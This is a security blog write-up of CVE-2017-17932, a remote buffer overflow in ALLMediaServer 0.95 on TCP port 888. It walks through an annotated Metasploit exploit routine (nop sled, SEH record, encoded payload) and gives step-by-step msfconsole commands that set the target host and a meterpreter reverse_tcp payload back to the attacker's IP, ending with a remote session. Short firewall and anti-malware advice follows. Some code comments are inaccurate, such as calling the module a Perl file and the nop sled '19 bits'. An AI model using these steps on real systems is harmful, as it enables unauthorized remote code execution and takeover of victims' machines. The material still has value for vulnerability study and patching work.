ALLMediaServer Remote Buffer Overflow | CVE-2017-17932 | Lucideus Research

Vulnerable Application Details
ALLMediaServer is very easy to use DLNA server that enables you to watch movies, listen to music or view photos you have on your computer on your TV, smartphone or other connected equipment Samsung AllShare or DLNA compatible. Device on which you want to view files from your computer must be connected to the computer by local Ethernet or WiFi. Setting up such a network is very simple and allows you not only watch movies on TV or listening to music using ALLMediaServer, but also gives you the ability to browse the Internet or connect to instant messaging (such as Skype) with other users of the Internet (of course, all of these functions must be supported by your TV or other device).

Vulnerability Details
A  buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 888.


          Understanding Exploit Code



















  1.  def exploit
  2. connect
  3. buffer = "" //We are creating a variable named as “Buffer”.
  4. buffer << make_nops(target['Offset']) // Generates a nop sled of a supplied length and stores it into the variable “buffer”.
  5. buffer << generate_seh_record(target.ret) //Generates an SEH record with zero or more options.
  6. buffer << make_nops(19) //Generates a nop sled of 19 bits.
  7. buffer << payload.encoded // This line encodes the payload specified within Metasploit and encodes it in the required format. Metasploit will internally determine what payloads are suitable given the space available and the target operating system, and they can be viewed with the ‘show payloads’ command. When we say ‘required format’ it means that it will exclude the nominated bad characters earlier in the exploit. It stores the generated payload in “buffer”.
  8. print_status("Sending payload ...") //This line is creating the connection and transmitting “buffer” over the connection, which is actually a payload.
  9. sock.put(buffer)
  10. handler
  11. disconnect
  12. end


Proof of Concept
Step 1: Download the Vulnerable Application (Version 0.95 or earlier) from :  http://www.allmediaserver.org/download



Step 2: Download the Exploit Module from : https://www.exploit-db.com/exploits/43407/

Step 3: Copy the Perl file to /root/.msf4/modules/exploits/windows/dos/allmediaserver (You will have to create the Folders windows -> dos -> allmediaserver).

Step 4: Fire up Metasploit Framework and type the following commands:
  • msfconsole
  • reload_all
  • search 43407
  • use exploit/windows/dos/allmediaserver/43407
  • show options
  • set rhost <target IP Address>

Step 5: After using the exploit, it is time to set the payload. For this, type the following commands: 
  • set payload windows/meterpreter/reverse_tcp 
  • show options 
  • set LHOST <attacker’s IP Address> 
  • exploit
 


Step 6: Here we got the meterpreter session on the target machine.
Basic Recommendations To protect your machine which have AllMediaServer installed make sure you configure the firewall and Anti-Malware properly. The following are few methods, which we can adopt to stay safe:
  • Never turn off the firewall and always keep updating the firewall on regular basis if you are using any third party firewall except windows inbuilt .
  • Configure a custom rule for port number 888. This is the port which “All Media Server” is using for the services.
  • If you are using an Anti-Malware, then keep the network security and firewall protection “ON”. Keep on updating the database of your Anti-Malware from time to time in case you are not getting automated updates.

No comments:

Powered by Blogger.